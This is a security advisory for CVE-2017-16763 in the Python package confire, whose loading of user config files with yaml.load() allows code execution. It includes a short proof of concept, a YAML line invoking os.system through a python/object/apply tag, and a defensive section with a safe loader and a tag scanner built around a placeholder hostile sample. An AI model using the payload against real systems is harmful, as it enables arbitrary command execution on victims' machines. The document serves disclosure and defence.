CVE-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th, 2017

Reported by:       Joel

CVE-2017-16763    (CVE details)

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Because the user-specific configuration is loaded from ~/.confire.yaml using yaml.load(), an issue was discovered in the Confire package before 0.2.0. Untrusted data placed in a confire.yaml file can execute arbitrary Python code when the configuration is loaded, resulting in command execution.

POC

from confire import Configuration

class MyConfig(Configuration):
    mysetting = True
    logpath   = "/var/log/myapp.log"
    appname   = "MyApp"

# load() walks confire's CONF_PATHS; before 0.2.0 each file found is parsed
# with yaml.load(), so the user-specific file is trusted completely.
settings = MyConfig.load()

# CONF_PATHS as defined in confire:
# CONF_PATHS = [
#     '/etc/confire.yaml',                    # The global configuration
#     os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#     os.path.abspath('conf/confire.yaml'),   # Local directory configuration
# ]

# Contents of ~/.confire.yaml used by the POC:
# '~/.confire.yaml': !!python/object/apply:os.system ["calc.exe"]

Remediation

Updated versions of confire (0.2.0 and later) use yaml.safe_load, which refuses to construct Python objects from YAML tags and so prevents the code execution described above.
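The following is an added example, not code from confire or from the advisory author, showing the two defender-side pieces the Overview and Remediation imply: loading a user config with yaml.safe_load only, and scanning a config file for python/* tags before it is ever loaded. It assumes PyYAML is installed; the hostile sample is constructed and its command is a placeholder that is never executed.

```python
# Added example (not confire's own code): a hardened loader for a user config
# such as ~/.confire.yaml that (1) refuses to construct Python objects by using
# yaml.safe_load, and (2) scans a file for python/* tags *before* loading, using
# yaml.parse, which only tokenises the stream and never instantiates objects.
import yaml

PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"   # what "!!python/..." expands to


def find_python_tags(text):
    """Return the list of python/* tags present in a YAML document.

    yaml.parse() emits parser events without building any objects, so it is
    safe to run on an untrusted file; any hit means yaml.load() would have
    executed code (or built arbitrary objects) when reading that file.
    """
    found = []
    for event in yaml.parse(text):
        tag = getattr(event, "tag", None)          # only node-start events carry a tag
        if tag and tag.startswith(PYTHON_TAG_PREFIX):
            found.append(tag)
    return found


def load_user_config(text):
    """Load a user config the way confire >= 0.2.0 does: safe_load only.

    Returns (config_dict, error). A document carrying python/* tags is rejected
    by the SafeLoader with a ConstructorError instead of being executed.
    """
    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError as exc:                  # ConstructorError is a subclass
        return None, f"rejected: {exc.__class__.__name__}"
    return (data or {}), None


# Constructed sample inputs: a benign config and one carrying the
# python/object/apply tag from the advisory (the command is a placeholder).
BENIGN = "mysetting: false\nlogpath: /tmp/myapp.log\nappname: MyApp\n"
HOSTILE = "logpath: !!python/object/apply:os.system ['echo PLACEHOLDER']\n"

if __name__ == "__main__":
    print(find_python_tags(HOSTILE))   # ['tag:yaml.org,2002:python/object/apply:os.system']
    print(load_user_config(BENIGN))    # ({'mysetting': False, 'logpath': '/tmp/myapp.log', 'appname': 'MyApp'}, None)
    print(load_user_config(HOSTILE))   # (None, 'rejected: ConstructorError')
```

Running find_python_tags over each path in CONF_PATHS before calling load() gives an audit hook for existing deployments that cannot upgrade immediately.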